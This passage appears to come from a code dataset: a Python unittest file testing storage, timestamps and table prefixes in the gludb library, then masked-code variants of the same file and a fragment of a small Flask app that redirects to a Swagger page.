self.assertRaises(ValueError, try_op)
def test_justnomap(self):
mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database('sqlite',
filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.
__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
read_obj = all_recs[0]
read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = 'Prefix'
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +
SimpleStorage.__table_name__)
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
<|reserved_special_token_1|>
"""Testing data storage functionality in gludb.simple (see simple_tests.py for
testing of the rest of gludb.simple functionality)"""
import unittest
import datetime
import time
import gludb.config
from gludb.versioning import VersioningTypes
from gludb.data import orig_version
from gludb.simple import DBObject, Field
from gludb.utils import parse_now_field
from utils import compare_data_objects
@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)
class SimpleStorage(object):
name = Field('default name')
descrip = Field()
age = Field(42)
extra_data = Field(dict)
# Same tests as DefaultStorageTesting but with differnt setUp/tearDown
class MissingMapTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(None) # no default database
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
def test_failedops(self):
def try_op():
return gludb.config.get_mapping(SimpleStorage)
self.assertRaises(ValueError, try_op)
def test_justnomap(self):
mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database(
'sqlite',
filename=':memory:'
))
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
# Sucks, but we need to space out our timestamps
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
# Note that we DON'T check for string equality - that's because
# _last_update is updated every time the instance method to_data is
# called. See simple.md for extra details on auto fields
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
# Saved - so should have a prev version that is identical
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
# Change the object we read and then insure that the pervious version
# saved on load is correct
read_obj = all_recs[0]
read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
# Same tests as DefaultStorageTesting but with differnt setUp/tearDown
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None) # no default database
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite',
filename=':memory:'
))
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
# Same tests as DefaultStorageTesting but with differnt setUp/tearDown
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = "Prefix"
def setUp(self):
gludb.config.default_database(None) # no default database
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite',
filename=':memory:'
))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = self.PREFIX + gludb.config._APPLICATION_SEP + SimpleStorage.__table_name__
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
|
flexible
|
{
"blob_id": "7383ae97d6a1368896d05d0cafc9846c24004701",
"index": 2690,
"step-1": "<mask token>\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n <mask token>\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n <mask token>\n <mask token>\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-2": "<mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-3": "<mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(None)\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-4": "<mask token>\n\n\n@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)\nclass SimpleStorage(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(None)\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-5": "\"\"\"Testing data storage functionality in gludb.simple (see simple_tests.py for\ntesting of the rest of gludb.simple functionality)\"\"\"\n\nimport unittest\nimport datetime\nimport time\n\nimport gludb.config\n\nfrom gludb.versioning import VersioningTypes\nfrom gludb.data import orig_version\nfrom gludb.simple import DBObject, Field\nfrom gludb.utils import parse_now_field\n\nfrom utils import compare_data_objects\n\n\n@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)\nclass SimpleStorage(object):\n name = Field('default name')\n descrip = Field()\n age = Field(42)\n extra_data = Field(dict)\n\n\n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass MissingMapTesting(unittest.TestCase):\n def setUp(self):\n gludb.config.default_database(None) # no default database\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n def setUp(self):\n gludb.config.default_database(gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n \n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.__table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n\n # Sucks, but we need to space out our timestamps\n time.sleep(0.3)\n\n s.descrip = 'SecondSave'\n s.save()\n\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n\n # Note that we DON'T check for string equality - that's because\n # _last_update is updated every time the instance method to_data is\n # called. See simple.md for extra details on auto fields\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n\n self.assertTrue(orig_version(s) is None)\n\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n # Saved - so should have a prev version that is identical\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n\n # Change the object we read and then insure that the pervious version\n # saved on load is correct\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass SpecificStorageTesting(DefaultStorageTesting):\n def setUp(self):\n gludb.config.default_database(None) # no default database\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n \n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = \"Prefix\"\n \n def setUp(self):\n gludb.config.default_database(None) # no default database\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n \n def test_table_has_prefix(self):\n expectedName = self.PREFIX + gludb.config._APPLICATION_SEP + SimpleStorage.__table_name__\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)",
"step-ids": [
16,
21,
24,
25,
28
]
}
|
[
16,
21,
24,
25,
28
] |
<|reserved_special_token_0|>
@app.route('/')
def redirect_to_swagger():
return redirect('/swagger', 302)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(path / '../schemas.json', 'r') as fp:
schemas = load(fp)
with open(path / '../config.json', 'r') as fp:
config = load(fp)
<|reserved_special_token_0|>
@app.route('/')
def redirect_to_swagger():
return redirect('/swagger', 302)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
path = Path(__file__).parent
db = SQLAlchemy()
with open(path / '../schemas.json', 'r') as fp:
schemas = load(fp)
with open(path / '../config.json', 'r') as fp:
config = load(fp)
app = Flask(__name__, template_folder='templates')
